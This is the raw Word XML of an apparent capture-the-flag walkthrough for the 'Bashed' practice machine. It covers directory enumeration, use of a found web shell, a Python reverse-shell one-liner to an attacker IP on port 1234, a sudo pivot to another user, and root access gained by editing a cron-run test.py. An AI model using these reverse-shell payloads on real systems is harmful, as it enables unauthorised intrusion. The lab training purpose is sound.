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E5F92" w14:textId="205E0315" w:rsidR="007206B4" w:rsidRDefault="001E62DB">
      <w:r>
        <w:t>Bashed HTB Walkthrough:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A8F3A0" w14:textId="59972767" w:rsidR="001E62DB" w:rsidRDefault="001E62DB"/>
    <w:p w14:paraId="16CF71F0" w14:textId="261FB6E8" w:rsidR="001E62DB" w:rsidRDefault="001E62DB">
      <w:r>
        <w:t xml:space="preserve">Please refer the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>resulta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the bashed folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B8AAAA" w14:textId="5DA1A0D0" w:rsidR="001E62DB" w:rsidRDefault="001E62DB">
      <w:r>
        <w:t xml:space="preserve">As the port 80 is open I have </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ran</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tool to list the directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D545FE7" w14:textId="1CA32807" w:rsidR="001E62DB" w:rsidRDefault="001E62DB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="078190FB" wp14:editId="5F86ADA9">
            <wp:extent cx="4104640" cy="354165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605" cy="35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4D90" w14:textId="27714F9B" w:rsidR="001E62DB" w:rsidRDefault="001E62DB">
      <w:r>
        <w:t xml:space="preserve">After seeing the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>results</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  I have php folder then below screen Is visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4107BF81" w14:textId="4B153168" w:rsidR="001E62DB" w:rsidRDefault="001E62DB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12FE13A2" wp14:editId="4989EB50">
            <wp:extent cx="3603413" cy="24930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732" cy="25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385A" w14:textId="198F91EA" w:rsidR="001E62DB" w:rsidRDefault="001E62DB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="455E0A25" wp14:editId="55B7478F">
            <wp:extent cx="7566336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3958" cy="284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7575" w14:textId="0644650B" w:rsidR="001E62DB" w:rsidRDefault="001E62DB">
      <w:r>
        <w:t xml:space="preserve">We have got the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> which is hosted on the browser, let get the interactive shell with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> opening port on your terminal. I have  tried with all the shell got succeeded on the python script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6EF90959" w14:textId="5CB357D9" w:rsidR="001E62DB" w:rsidRPr="001E62DB" w:rsidRDefault="001E62DB" w:rsidP="001E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python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.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10.14.2</w:t>
      </w:r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="00780303">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>1234</w:t>
      </w:r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));os.dup2(s.fileno(),0); os.dup2(</w:t>
      </w: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s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(),1); os.dup2(</w:t>
      </w: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s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(),2);p=</w:t>
      </w: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subprocess.call</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(["/bin/</w:t>
      </w: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","-</w:t>
      </w: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"]);'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E507EE" w14:textId="62E89C22" w:rsidR="001E62DB" w:rsidRDefault="001E62DB"/>
    <w:p w14:paraId="10BAA77C" w14:textId="6727F234" w:rsidR="001E62DB" w:rsidRDefault="001E62DB">
      <w:r>
        <w:t>once I got the shell, successfully located user.txt file under home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02839733" w14:textId="0F55C236" w:rsidR="001E62DB" w:rsidRDefault="001E62DB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="680837E7" wp14:editId="4F81C38E">
            <wp:extent cx="3508587" cy="308216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191" cy="309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38CA" w14:textId="4BC4C72A" w:rsidR="001E62DB" w:rsidRDefault="00F607F6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F607F6">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F607F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00F607F6">
        <w:t xml:space="preserve">u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F607F6">
        <w:t>scriptmanager</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F607F6">
        <w:t xml:space="preserve"> -e </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00F607F6">
        <w:t>/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7D392A" w14:textId="77777777" w:rsidR="000D7386" w:rsidRDefault="000D7386"/>
    <w:p w14:paraId="1A9C51C2" w14:textId="0C97A175" w:rsidR="000D7386" w:rsidRDefault="000D7386">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3019BA2E" wp14:editId="4DAEC685">
            <wp:extent cx="5731510" cy="458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AE91" w14:textId="77777777" w:rsidR="000D7386" w:rsidRDefault="000D7386"/>
    <w:p w14:paraId="57198586" w14:textId="79F9442F" w:rsidR="00AD294A" w:rsidRDefault="00780303">
      <w:r>
        <w:t xml:space="preserve">Go to the </w:t>
      </w:r>
      <w:r w:rsidR="000D7386">
        <w:t xml:space="preserve">home folder of normal user and then to </w:t>
      </w:r>
      <w:r w:rsidR="000D7386" w:rsidRPr="000D7386">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scripts</w:t>
      </w:r>
      <w:r w:rsidR="000D7386">
        <w:t xml:space="preserve"> tab the edit the </w:t>
      </w:r>
      <w:r w:rsidR="000D7386" w:rsidRPr="000D7386">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>test.py</w:t>
      </w:r>
      <w:r w:rsidR="000D7386">
        <w:t xml:space="preserve"> file with </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D1142" w14:textId="77777777" w:rsidR="000D7386" w:rsidRDefault="000D7386" w:rsidP="000D7386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socket,subprocess,os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62AC0351" w14:textId="77777777" w:rsidR="000D7386" w:rsidRDefault="000D7386" w:rsidP="000D7386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s=</w:t>
      </w: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socket.socket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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socket.AF_INET,socket.SOCK_STREAM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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081B4E" w14:textId="77777777" w:rsidR="000D7386" w:rsidRDefault="000D7386" w:rsidP="000D7386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s.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(("10.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10.14.2</w:t>
      </w:r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1234</w:t>
      </w:r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));os.dup2(</w:t>
      </w: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s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(),0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C7A38" w14:textId="77777777" w:rsidR="000D7386" w:rsidRDefault="000D7386" w:rsidP="000D7386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os.dup2(</w:t>
      </w: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s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(),1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB98BFD" w14:textId="77777777" w:rsidR="000D7386" w:rsidRDefault="000D7386" w:rsidP="000D7386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os.dup2(</w:t>
      </w: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s.fileno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(),2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3C33FD" w14:textId="508D961D" w:rsidR="000D7386" w:rsidRDefault="000D7386" w:rsidP="000D7386">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6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p=</w:t>
      </w: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subprocess.call</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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(["/bin/</w:t>
      </w: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","-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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E62DB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62C4AAC1" w14:textId="4EB75DF6" w:rsidR="000D7386" w:rsidRDefault="000D7386" w:rsidP="000D7386">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBd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B9C8BE5" wp14:editId="411E99F2">
            <wp:extent cx="4050453" cy="133908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259" cy="13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0624" w14:textId="40874E7F" w:rsidR="000D7386" w:rsidRDefault="000D7386" w:rsidP="000D7386"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press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ctrl+z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the remote shell and then add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sttyl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raw -echo” and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fg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(won’t be visible on the screen )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A55BF6A" w14:textId="3515CDDB" w:rsidR="000D7386" w:rsidRDefault="000D7386">
      <w:r>
        <w:t>then open the test.py file with vi, press and hold the ‘d’ to delete all the content and then press ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208712DE" w14:textId="6D1DDDD8" w:rsidR="000D7386" w:rsidRDefault="000D7386">
      <w:r>
        <w:t xml:space="preserve">to get the insert mode and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctrl+shift+v</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to paste the data. After one minute it will get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execurte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and go the root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD49CBC" w14:textId="7AB1B8ED" w:rsidR="000D7386" w:rsidRDefault="000D7386">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F106525" wp14:editId="6C43400D">
            <wp:extent cx="4158827" cy="201490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940" cy="202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DB"/>
    <w:rsid w:val="000D7386"/>
    <w:rsid w:val="001E62DB"/>
    <w:rsid w:val="00636E71"/>
    <w:rsid w:val="007206B4"/>
    <w:rsid w:val="00780303"/>
    <w:rsid w:val="00AD294A"/>
    <w:rsid w:val="00C20AA6"/>
    <w:rsid w:val="00F6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CD34"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F0AB16DA-4CDB-4B4B-8C23-56403848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2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AD294A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AD2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Munimadugu Somasekhar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Munimadugu Somasekhar</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-26T05:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-26T13:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>